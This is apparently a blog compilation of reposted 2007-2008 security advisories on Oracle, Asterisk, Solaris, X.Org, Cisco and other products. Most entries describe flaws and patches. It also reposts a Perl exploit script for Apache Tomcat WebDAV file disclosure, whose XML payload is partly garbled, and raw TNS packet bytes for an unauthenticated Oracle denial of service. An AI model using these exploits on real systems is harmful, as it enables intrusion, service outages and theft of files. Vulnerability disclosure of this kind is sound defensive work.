October 17th, 2007

NGSSoftware Insight Security Research Advisory

Name: SQL Injection Flaw in Oracle Workspace Manager
Systems Affected: Oracle 10g release 1 and 2, Oracle 9i
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ davidl@ngssoftware.com ]
Reported: 22nd August 2006
Date of Public Advisory: 17th October 2007
Advisory number: #NISR17102007B

Description
***********
The Workspace Manager in Oracle 10g release 1 and 2 and Oracle 9i is
vulnerable to SQL injection.

Details
*******

The Workspace Manager, owned by SYS, contains a package called LT. This
package is owned and defined by the SYS user and can be executed by PUBLIC.
LT contains a procedure called FINDRICSET which calls the FINDRICSET package
in the LTRIC package. This is vulnerable to SQL injection and can be abused
by an attacker to gain SYS privileges.

Fix Information
***************
Oracle was alerted to this flaw on the 22nd of August 2006. A patch has now
been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner
designed specifically for Oracle, can be used to accurately determine
whether your servers are vulnerable to this flaw. More information about
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php

About NGSSoftware
*****************
NGSSoftware develops vulnerability assessment and compliancy tools for
database servers including Oracle, Microsoft SQL Server, DB2, Sybase and
Informix. Headquartered in the United Kingdom NGS has offices in London, St.
Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United
States; NGSConsulting provide services to some of the largest and most
demanding organizations around the globe.
http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076
enquiries@ngssoftware.com

High Risk Vulnerability in Oracle RDBMS

2008-02-08T06:59:00.000-08:00

Tomado de: http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-rdbms/

High Risk Vulnerability in Oracle RDBMS

October 17th, 2007

NGSSoftware Insight Security Research Advisory

Name: Oracle RDBMS Data packet DoS
Systems Affected: Oracle 8.1.7.4, 10g Release 2 and 1, Oracle 9
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ davidl@ngssoftware.com ]
Reported: 23rd June 2006
Date of Public Advisory: 17th October 2007
Advisory number: #NISR17102007D

Description
***********
The Oracle RDBMS on receiving an invalid TNS data packet will use 100% of
the CPU’s time introducing a Denial of Service condition.

Details
*******
Once a client connects to the database process and performs protocol
negoation (TNS packet type 1) and data type represenations (packet type 2)
it may then send packets of type 6 - Data packets. If the server gets a
packet with the 2nd bit of the Data flags is set then the server runs at
100% CPU:

“\x00\x1D” // Packet Size
“\x00\x00″ // Packet Checksum
“\x06″ // Packet Type [DATA]
“\x00″ // Flags
“\x00\x00″ // Header Checksum
“\x00\x02″ // Data flags
“\x03\x3B” // TTI Version function
..
..

The snippet of a packet above sets the Data flags to 0×0002 on a version
request. This DoS condition can be triggered prior to authentication. This
can be exploited by an unauthenticated attacker.

Fix Information
***************
Oracle was alerted to this flaw on the 23rd of June 2006. A patch has now
been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner
designed specifically for Oracle, can be used to accurately determine
whether your servers is vulnerable to this flaw. More information about
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php

About NGSSoftware
*****************
NGSSoftware develops vulnerability assessment and compliancy tools for
database servers including Oracle, Microsoft SQL Server, DB2, Sybase and
Informix. Headquartered in the United Kingdom NGS has offices in London,
St. Andrews (UK), Brisbane, and Perth (Australia) and seattle in the United
States; NGSConsulting provide services to some of the largest and most
demanding organizations around the globe.
http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076
enquiries@ngssoftware.com

High Risk Vulnerability in Oracle XMLDB FTP Service

2008-02-08T06:58:00.002-08:00

tomado de:http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-xmldb-ftp-service/

High Risk Vulnerability in Oracle XMLDB FTP Service

October 17th, 2007

NGSSoftware Insight Security Research Advisory

Name: Oracle audit issue with XMLDB ftp service
Systems Affected: Oracle Oracle 9ir2, 10g Release 1
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ davidl@ngssoftware.com ]
Reported: 9th March 2006
Date of Public Advisory: 17th October 2007
Advisory number: #NISR17102007E

Description
***********
The Oracle XML DB ftp service contains problems with auditing logins.

Details
*******
When a user attempts to log in via the XDB ftp service the audit trail shows
an incorrect entry for USERID. This can present two subtle problems.
Firstly, if a user logs in as “SYSTEM” the USERID column only shows “SYSTE”
- only 5 characters. The second problem is that if the same user then
attempts to log in a user “FOO”, “FOOTE” is logged in the USERID column -
the “TE” coming from the “TE” of “SYSTE[M]” - the previous login. This only
happens on the same connected TCP circuit; as such all audit entries have
the same SESSIONID.

Fix Information
***************
Oracle was alerted to this flaw on the 9th of March 2006. A patch has now
been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php

About NGSSoftware
*****************
NGSSoftware develops vulnerability assessment and compliancy tools for
database servers including Oracle, Microsoft SQL Server, DB2, Sybase and
Informix. Headquartered in the United Kingdom NGS has offices in London,
St. Andrews (UK), Brisbane, and Perth (Australia) and seattle in the United
States; NGSConsulting provide services to some of the largest and most
demanding organizations around the globe.
http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076
enquiries@ngssoftware.com

High Risk Vulnerability in Oracle TNS Listener

2008-02-08T06:58:00.001-08:00

Tomado de http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-tns-listener/

High Risk Vulnerability in Oracle TNS Listener

October 17th, 2007

NGSSoftware Insight Security Research Advisory

Name: Oracle TNS Listener DoS and/or remote memory inspection
Systems Affected: Oracle 8.1.7.4, 10g Release 2 and 1, Oracle 9
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ davidl@ngssoftware.com ]
Reported: 22nd June 2006
Date of Public Advisory: 17th October 2007
Advisory number: #NISR17102007C

Description
***********
The TNS Listener can be crashed by an attacker causing a Denial of Service;
alternatively the attacker can use the same flaw to expose memory contents
remotely. This may reveal sensitive information.

Details
*******
There is a bug in GIOP service that can allow an attacker to crash the TNS
Listener and/or dump memory. A DWORD in the connect GIOP packet is trusted
as the size of the data in the packet. By setting this to a large value
(e.g. 0×1FFFF) causes the listener to allocate this much memory then attempt
to copy this much data to it - which eventually leads to a read access
violation because the source data is less than this number and the process
lands in uninitialized memory. If the attacker uses a smaller number, e.g.
0xFFFF they can dump this many bytes from memory. This may reveal sensitive
information such as the TNS Listener password.

Fix Information
***************
Oracle was alerted to this flaw on the 22nd of June 2006. A patch has now
been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php

About NGSSoftware
*****************
NGSSoftware develops vulnerability assessment and compliancy tools for
database servers including Oracle, Microsoft SQL Server, DB2, Sybase and
Informix. Headquartered in the United Kingdom NGS has offices in London,
St. Andrews (UK), Brisbane, and Perth (Australia) and seattle in the United
States; NGSConsulting provide services to some of the largest and most
demanding organizations around the globe.
http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076
enquiries@ngssoftware.com

High Risk Vulnerability in Oracle CTX_DOC

2008-02-08T06:55:00.002-08:00

Tomado de: http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-ctx-doc/

High Risk Vulnerability in Oracle CTX_DOC

October 17th, 2007

NGSSoftware Insight Security Research Advisory

Name: Multiple SQL Injection Flaws in Oracle CTX_DOC package
Systems Affected: Oracle 10g release 1 and 2
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ davidl@ngssoftware.com ]
Reported: 6 June 2005
Date of Public Advisory: 17th October 2007
Advisory number: #NISR17102007A

Description
***********
The Intermedia application in Oracle 10g release 1 and 2 is vulnerable to
SQL injection.

Details
*******
The Intermedia application, owned by CTXSYS, contains a package called
CTX_DOC. This package contains multiple SQL injection flaws. The following
procedures on this package provide vectors for SQL injection attacks:

THEMES
GIST
TOKENS
FILTER
HIGHLIGHT
MARKUP

These can be exploited by a database user; further they can be exploited via
Oracle Application Server by an attacker without a user ID and password
across the Internet.

Fix Information
***************
Oracle was alerted to these flaws on the 6th of June 2005. A patch has now
been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner
designed specifically for Oracle, can be used to accurately determine
whether your servers are vulnerable to these flaws. More information about
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php

OPAL SIP Protocol DoS

2008-02-08T06:55:00.001-08:00

Tomado de: http://www.securiteam.com/unixfocus/6N00C2AK0M.html

OPAL (Open Phone Abstraction Layer) is "an implementation of various telephony and video communication protocols for use over packet based networks. It's based on code from the OpenH323 project and adds new features such as a stream based architecture, better support for re-use or removal of sub-components, and explicit support for additional protocols". A vulnerability in OPAL allows attackers to cause the framework to crash by sending it a malformed Content-Length value.

Credit:
The information has been provided by Jose Miguel Esparza.

Audit your web server for security holes - see what the hackers see.
Sign up for a scan today - risk free!

Vulnerable Systems:
* OPAL version 2.2.8
* Ekiga version 2.0.9

File: sippdu.cxx
Function: SIP_PDU::Read(OpalTransport & transport)
Instruction: entityBody[contentLength] = '\0';

An insufficient input validation of the Content-Length field of a SIP request cause the application to crash due to a memory mismanagement.

Workaround:
A patch in the URL http://openh323.cvs.sourceforge.net/openh323/opal/src/sip/sippdu.cxx?r1=2.83.2.19&r2=2.83.2.20 is available, but upgrading to new version 2.2.10 is recommended.

Asterisk cdr_addon_mysql SQL Injection Vulnerability

2008-02-08T06:53:00.000-08:00

tomado de : http://downloads.digium.com/pub/security/AST-2007-023.html

Asterisk Project Security Advisory - AST-2007-023

Product

Asterisk-Addons

Summary

SQL Injection Vulnerability in cdr_addon_mysql

Nature of Advisory

SQL Injection

Susceptibility

Remote Unauthenticated Sessions

Severity

Minor

Exploits Known

Yes

Reported On

October 16, 2007

Reported By

Humberto Abdelnur

Posted On

October 16, 2007

Last Updated On

October 16, 2007

Advisory Contact

Tilghman Lesher

CVE Name

CVE-2007-5488

Description

The source and destination numbers for a given call are not correctly escaped by the cdr_addon_mysql module when inserting a record. Therefore, a carefully crafted destination number sent to an Asterisk system running cdr_addon_mysql could escape out of a SQL data field and create another query. This vulnerability is made all the more severe if a user were using realtime data, since the data may exist in the same database as the inserted call detail record, thus creating all sorts of possible data corruption and invalidation issues.

Resolution

The Asterisk-addons package is not distributed with Asterisk, nor is it installed by default. The module may be either disabled or upgraded to fix this issue.

Affected Versions

Product

Release Series

Asterisk Open Source

1.0.x

All versions

Asterisk Open Source

1.2.x

All versions prior to asterisk-addons-1.2.8

Asterisk Open Source

1.4.x

All versions prior to asterisk-addons-1.4.4

Asterisk Business Edition

A.x.x

Unaffected

Asterisk Business Edition

B.x.x

Unaffected

AsteriskNOW

pre-release

Unaffected

Asterisk Appliance Developer Kit

0.x.x

Unaffected

s800i (Asterisk Appliance)

1.0.x

Unaffected

Corrected In

Product

Release

Asterisk-Addons

1.2.8

Asterisk-Addons

1.4.4

Links

Asterisk Project Security Advisories are posted at http://www.asterisk.org/security.

This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2007-023.pdf and http://downloads.digium.com/pub/security/AST-2007-023.html.

Revision History

Date

Editor

Revisions Made

2007-10-16

Tilghman Lesher

Initial release

2007-10-16

Tilghman Lesher

Added CVE number

Asterisk Project Security Advisory - 2007-AST-023
Copyright © 2007 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.

Apache Tomcat Remote File Disclosure Zeroday Xploit

2008-02-08T06:51:00.000-08:00

tomado :http://www.milw0rm.com/exploits/4530

#!/usr/bin/perl
#******************************************************
# Apache Tomcat Remote File Disclosure Zeroday Xploit
# kcdarookie aka eliteb0y / 2007
#
# thanx to the whole team & andi :)
# +++KEEP PRIV8+++
#
# This Bug may reside in different WebDav implementations,
# Warp your mind!
# +You will need auth for the exploit to work...
#******************************************************

use IO::Socket;
use MIME::Base64; ### FIXME! Maybe support other auths too ?

# SET REMOTE PORT HERE
$remoteport = 8080;

sub usage {
print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
print "kcdarookie aka eliteb0y / 2007\n";
print "usage: perl TOMCATXPL [username] [password]\n";
print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat\n";exit;
}

if ($#ARGV < 2) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$remotefile = $ARGV[2];

$username = $ARGV[3];
$password = $ARGV[4];

my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
PeerPort => $remoteport,
Proto => 'tcp');

$|=1;
$BasicAuth = encode_base64("$username:$password");

$KRADXmL =
"\n"
."."\n"
."]>\n"
."\n"
."\n"
."\n"
."\n"
."\n"
."\n"
."&RemoteX;\n"
."\n"
."\n"
."\n"
."\n";

print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
print "kcdarookie aka eliteb0y / 2007\n";
print "Launching Remote Exploit...\n";

$ExploitRequest =
"LOCK $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n";

if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;

print $sock $ExploitRequest;

while(<$sock>) {
print;
}

# milw0rm.com [2007-10-14]

IMAP Storage Buffer Overflows in Asterisk's Voicemail

2008-02-08T06:49:00.000-08:00

tomado de : http://downloads.digium.com/pub/security/AST-2007-022.html

Asterisk Project Security Advisory - AST-2007-022

Product

Asterisk

Summary

Buffer overflows in voicemail when using IMAP storage

Nature of Advisory

Remotely and locally exploitable buffer overflows

Susceptibility

Remote Unauthenticated Sessions

Severity

Minor

Exploits Known

No

Reported On

October 9, 2007

Reported By

Russell Bryant

Mark Michelson

Posted On

October 9, 2007

Last Updated On

October 15, 2007

Advisory Contact

Mark Michelson

CVE Name

CVE-2007-5358

Description

The function â€œsprintfâ€ was used heavily throughout the IMAP-specific voicemail code. After auditing the code, two vulnerabilities were discovered, both buffer overflows.

The following buffer overflow required write access to Asterisk's configuration files in order to be exploited.

1) If a combination of the astspooldir (set in asterisk.conf), the voicemail context, and voicemail mailbox, were very long, then there was a buffer overflow when playing a message or forwarding a message (in the case of forwarding, the context and mailbox in question are the context and mailbox that the message was being forwarded to).

The following buffer overflow could be exploited remotely.

2) If any one of, or any combination of the Content-type or Content-description headers for an e-mail that Asterisk recognized as a voicemail message contained more than a 1024 characters, then a buffer would overflow while listening to a voicemail message via a telephone. It is important to note that this did NOT affect users who get their voicemail via an e-mail client.

Resolution

â€œsprintfâ€ calls have been changed to â€œsnprintfâ€ wherever space was not specifically allocated to the buffer prior to the sprintf call. This includes places which are not currently prone to buffer overflows.

Affected Versions

Product

Release Series

Asterisk Open Source

1.0.x

Unaffected

Asterisk Open Source

1.2.x

Unaffected

Asterisk Open Source

1.4.x

All versions prior to 1.4.13

Asterisk Business Edition

A.x.x

Unaffected

Asterisk Business Edition

B.x.x

Unaffected

AsteriskNOW

pre-release

Unaffected

Asterisk Appliance Developer Kit

0.x.x

Unaffected

s800i (Asterisk Appliance)

1.0.x

Unaffected

Corrected In

Product

Release

Asterisk Open Source

1.4.13

Links

Asterisk Project Security Advisories are posted at http://www.asterisk.org/security.

This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2007-022.pdf and http://downloads.digium.com/pub/security/AST-2007-022.html.

Revision History

Date

Editor

Revisions Made

October 9, 2007

mmichelson@digium.com

Initial Release

October 15, 2007

mmichelson@digium.com

Added CVE name

Asterisk Project Security Advisory - AST-2007-022
Copyright © 2007 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.

Sun Microsystems Solaris FIFO FS Information Disclosure Vulnerability

2008-02-08T06:48:00.000-08:00

Tomado de: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=603
PUBLIC ADVISORY: 10.02.07
Home // Current Intelligence // Vulnerability Advisories // Public Advisory: 10.02.07
Email This Page URL Print This Page
Sun Microsystems Solaris FIFO FS Information Disclosure Vulnerability
I. BACKGROUND

Solaris is a UNIX operating system developed by Sun Microsystems. More information can be found at the following URL.

http://www.sun.com/software/solaris/
II. DESCRIPTION

Local exploitation of an integer signedness error in Sun Microsystem's Solaris could allow attackers to disclose sensitive information from memory.

The FIFO FS (First In First Out File System) is a service provided by the kernel that is commonly used for IPC (InterProcess Communication). A FIFO is represented as a node in the file system, and is similar to the concept of named pipes in Windows.

The vulnerability exists in the kernel ioctl() handler for FIFOs. The I_PEEK ioctl is used to peek at a number of bytes contained in the FIFO without actually removing them from the queue. One of the arguments to this command, which represents the number of bytes to peek, is a signed integer value. Since this parameter is not properly validated, a negative value can cause large amounts of kernel memory contents to be disclosed.
III. ANALYSIS

Exploitation allows an attacker to view potentially sensitive information belonging to the kernel or other users. For example, the root password hash or encryption keys might be disclosed.
IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Solaris 10 on x86 and SPARC. It is suspected that earlier versions are also affected.
V. WORKAROUND

iDefense is not aware of any workaround for this issue.
VI. VENDOR RESPONSE

Sun has addressed this vulnerability by releasing patches. For more information, consult Sun Alert 103061 at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-26-103061-1
VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.
VIII. DISCLOSURE TIMELINE

02/13/2007 Initial vendor notification
02/15/2007 Initial vendor response
10/02/2007 Coordinated public disclosure
IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES

Copyright � 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customer service for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

CORE FORCE Kernel Buffer Overflow

2008-02-08T06:34:00.000-08:00

tomado de:http://www.coresecurity.com/?action=item&id=2025

CORE FORCE Kernel Buffer Overflow

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Advisory Information

Title: CORE FORCE Kernel Buffer Overflow
Advisory ID: CORE-2007-1119
Advisory URL: http://www.coresecurity.com/?action=item&id=2025
Date published: 2008-01-17
Date of last update: 2008-01-17
Release mode: Coordinated release
Vulnerability Information

Class: Input validation error (Buffer Overflow)
Remotely Exploitable: No
Locally Exploitable: Yes
Bugtraq ID: 27341
CVE Name: CVE-2008-0366
Vulnerability Description

CORE FORCE is the first community oriented security solution for personal computers that provides a comprehensive endpoint security solution for Windows 2000 and Windows XP systems.

CORE FORCE provides inbound and outbound stateful packet filtering for TCP/IP protocols using a Windows port of OpenBSD's PF firewall, granular file system and registry access control and programs' integrity validation. These capabilities can be configured and enforced system-wide or on a per-application basis for specific programs such as email readers, Web browsers, media players, messaging software, etc. The security framework provided by CORE FORCE is leveraged by a community of security experts that share their security configurations for a growing list of programs. These security profiles can be downloaded by any user of CORE FORCE from the community Web site and they're also completely open so that they can be peer-reviewed to minimize security hazards.

Locally exploitable kernel buffer overflow vulnerabilities and unproperly validated input arguments have been found in CORE FORCE Firewall and Registry modules. The vulnerabilities allow unprivileged logged on users to crash the system (denial of service), and they also may lead to a privilege escalation or even a local root exploit.
Vulnerable packages

CORE FORCE 0.95.167 and below.
Non-vulnerable packages

CORE FORCE 0.95.172.
Vendor Information, Solutions and Workarounds

This vulnerability was fixed in CORE FORCE version 0.95.172 which is available at:
http://force.coresecurity.com/
Credits

This vulnerability was discovered by Sebastian Gottschalk.
Technical Description / Proof of Concept Code

The firewall functionality of CORE FORCE is as a port of OpenBSD’s PF firewall implemented as an NDIS complaint kernel driver that mediates communications between the Network card and the TCP/IP stack of the operating system. Thus stateful, bi-directional firewalling rules can be enforced independently of the Windows OS firewall capabilities and at a deeper layer, closer to the wire. The kernel driver is accessible to a user mode application via IOCTL functions.

There are 4 IOCTL functions on the firewall driver module that use input received from userspace and do not validate the length of the input buffers properly. By calling any of these IOCTLs from with properly crafted arguments, an unprivileged user could trigger vulnerabilities in the driver and cause a denial of service or potentially to execute arbitrary code with elevated privileges.

Similarly other 7 SSDT hook handler functions on the driver that intercepts the Registry access on Windows are vulnerable to input validation errors.

All the vulnerabilities can be reproduced by running a combination of DC2 and BSODHook tools.

* Step by step instructions:
* Get DC2.exe (Driver Path Verifier) from the latest Windows Driver Kit.
* Login as unprivileged user.
* Run "dc2 /hct /a"
* Get BSODHook.exe from Matousec [3]
* Click on "Load Driver" then click on "Find SSDT hooks" then "Add to probe list" and then "GO"

Report Timeline

* 2007-11-04: Initial notification by independent researcher Sebastian Gottschalk.
* 2007-11-05: Email acknowledging reception of the bug reports and indicating that looking into the report would probably take Core more than a week. Core requested details to reproduce a second type of bug related to hooking of the SSDT.
* 2007-11-05: Email from Sebastian Gottschalk indicating that the BSODhook from Matousec [3] could be used to reproduce the SSDT hooking problems.
* 2007-11-19: A fix is produced by the Core Force team. Core asks the researcher whether he wants to be credited for the discovery in the advisory.
* 2007-11-22: Sebastian Gottschalk accepts to be credited.
* 2007-11-28: Email sent to Sebastian Gottschalk indicating the Core found a bug in the fix and will have to delay publication of a fixed version of Core Force.
* 2007-11-29: New fix committed by the Core Force team.
* 2007-12-17: Other functions were also found vulnerable in the Registry module.
* 2008-01-07: New fix committed by the Core Force team.
* 2008-01-17: CORE-2007-1119 advisory is published.

References

[1] CORE FORCE: http://force.coresecurity.com/
[2] Driver testing: http://blogs.msdn.com/ravig/default.aspx
[3] http://www.matousec.com
About Corelabs

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at http://www.coresecurity.com/corelabs/
About Core Security Technologies

Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.
DISCLAIMER

The contents of this advisory are copyright (c) 2008 CORE Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
PGP/GPG KEYS

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

SocksCap Hostname Resolution Stack Overflow

2008-02-08T06:33:00.000-08:00

Tomado de :http://www.securiteam.com/windowsntfocus/5UP0P00N5C.html

SocksCap Hostname Resolution Stack Overflow 20 Jan. 2008

Summary
SocksCap is "an application wrapper developed by NEC. SocksCap allows Windows 95/98/NT users to enable their Winsock applications to traverse a SOCKS server. SocksCap does not require modifications to the Winsock applications or the Winsock stacks. On a SOCKS enabled firewall SocksCap offers a client-only solution". A vulnerability within SocksCap allows attacker to cause the program to overflow an internal buffer used by the hostname resolution mechanism.

Credit:
The information has been provided by Azizov.

Vulnerable Systems:
* SocksCap version 2.40-051231 and prior

Due to the fact that no length check is done during the hostname resolution process whenever the SockCap tries to resolve a remote resource, it is possible to cause the product to overflow a buffer used by the product. The overflow is triggered whenever the hostsname's name is more then 692 bytes.

Multiple Vendor X Server XFree86-Misc Extension Invalid Array Index Vulnerability

2008-02-08T06:29:00.000-08:00

tomado de: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=646
PUBLIC ADVISORY: 01.17.08
Home // Current Intelligence // Vulnerability Advisories // Public Advisory: 01.17.08
Email This Page URL Print This Page
Multiple Vendor X Server XFree86-Misc Extension Invalid Array Index Vulnerability
I. BACKGROUND

The X Window System (or X11) is a graphical windowing system used on Unix-like systems. It is based on a client/server model. More information about about The X Window system is available at the following URL.

http://en.wikipedia.org/wiki/X_Window_System
II. DESCRIPTION

Local exploitation of an invalid array index vulnerability in the X.Org X server, as included in various vendors' operating system distributions, could allow an attacker to execute arbitrary code with the privileges of the X server, typically root.

The vulnerability exists within the XFree86-Misc extension. When processing a request, a 32-bit value from the client's request is used as an index into an array of structures. This structure contains an array of function pointers, one of which is used later in the request handling. By supplying a large array index, an arbitrary function pointer can be dereferenced. This results in the execution of arbitrary code.
III. ANALYSIS

Exploitation allows an attacker to execute arbitrary code with root privileges. In order to exploit this vulnerability, an attacker must be able to send commands to an affected X server. This typically requires access to the console or access to the same account as a user who is on the console.

If an X Server is configured to listen for TCP based client connections, and a client is granted access to create sessions (via the xhosts file), then the vulnerability can be exploited remotely.
IV. DETECTION

iDefense has confirmed the existence of this vulnerability in X.org X11 version R7.3. Previous versions may also be affected.
V. WORKAROUND

If the XFree86-Misc extension has not been built-in to the server, then it can be prevented from loading by inserting the following into the X configuration file (usually in /etc/X11/xorg.conf).

Section "Module"
SubSection "extmod"
Option "omit XFree86-Misc"
EndSubSection
EndSection

To check if the extension is built-in to the server, grep the output of the X Server log file.

grep built-in /var/log/Xorg.0.log

The result will list all built in extensions. The location of the log file may need to be changed.
VI. VENDOR RESPONSE

The X.Org team has addressed this vulnerability with the release of Xserver version 1.4.1. Additionally, patches for versions 1.4 and 1.2 have been made available. For more information, consult the X.Org advisory at the following URL.

http://lists.freedesktop.org/archives/xorg/2008-January/031918.html
VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-5760 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE

11/29/2007 Initial vendor response
11/30/2007 Initial vendor notification
01/17/2008 Coordinated public disclosure
IX. CREDIT

This vulnerability was reported to VeriSign iDefense by regenrecht.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES

Copyright � 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customer service for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

Cisco PIX and ASA Time-to-Live Vulnerability

2008-02-08T06:27:00.000-08:00

Cisco Security Advisory: Cisco PIX and ASA Time-to-Live Vulnerability
Document ID: 100314
Advisory ID: cisco-sa-20080123-asa
http://www.cisco.com/warp/public/707/cisco-sa-20080123-asa.shtml
Revision 1.0
For Public Release 2008 January 23 1600 UTC (GMT)
Please provide your feedback on this document.
Contents

Summary
Affected Products
Details
Vulnerability Scoring Details
Impact
Software Versions and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: Final
Distribution
Revision History
Cisco Security Procedures

Summary

A crafted IP packet vulnerability exists in the Cisco PIX 500 Series Security Appliance (PIX) and the Cisco 5500 Series Adaptive Security Appliance (ASA) that may result in a reload of the device. This vulnerability is triggered during processing of a crafted IP packet when the Time-to-Live (TTL) decrement feature is enabled.

Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0028 has been assigned to this vulnerability.

Cisco has released free software updates that address this vulnerability. A workaround that mitigates this vulnerability is available.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080123-asa.shtml.
[Expand all sections] [Collapse all sections]
Affected Products
Vulnerable Products

The TTL decrement feature was introduced in version 7.2(2) and it is disabled by default. The Cisco PIX and ASA security appliances running software versions prior to 7.2(3)006 or 8.0(3) and that have the TTL decrement feature enabled are vulnerable.

By default the PIX and ASA security appliance software does not decrement the TTL of transient packets. The ability to decrement the TTL of transient packets can be enabled on a selective or global basis by using the set connection decrement-ttl command in the policy-map class configuration mode. To determine whether you are running this feature use the show running-config command and search for the set connection decrement-ttl command. Alternatively you can use the include argument to search for this command as follows:

ASA#show running-config | include decrement-ttl
set connection decrement-ttl
ASA#

The set connection decrement-ttl command is part of a configured class-map. In order for this command to take effect it must be applied using a policy-map (assigned globally or to an interface). For more information about the Modular Policy Framework on the Cisco ASA and PIX refer to the following link: http://www.cisco.com/en/US/docs/security/asa/asa80/configuration/guide/mpc.html

To determine whether you are running a vulnerable version of Cisco PIX or ASA software, issue the show version command-line interface (CLI) command. The following example shows a Cisco ASA Security Appliance that runs software release 7.2(3):

ASA#show version

Cisco Adaptive Security Appliance Software Version 7.2(3)

[...]

Customers who use the Cisco Adaptive Security Device Manager (ASDM) to manage their devices can find the version of the software displayed in the table in the login window or in the upper left corner of the ASDM window. The version notation is similar to the following:

PIX Version 7.2(3)

Products Confirmed Not Vulnerable

Cisco PIX and ASA security appliances which do not support the TTL decrement feature or are not explicitly configured for it are not vulnerable.

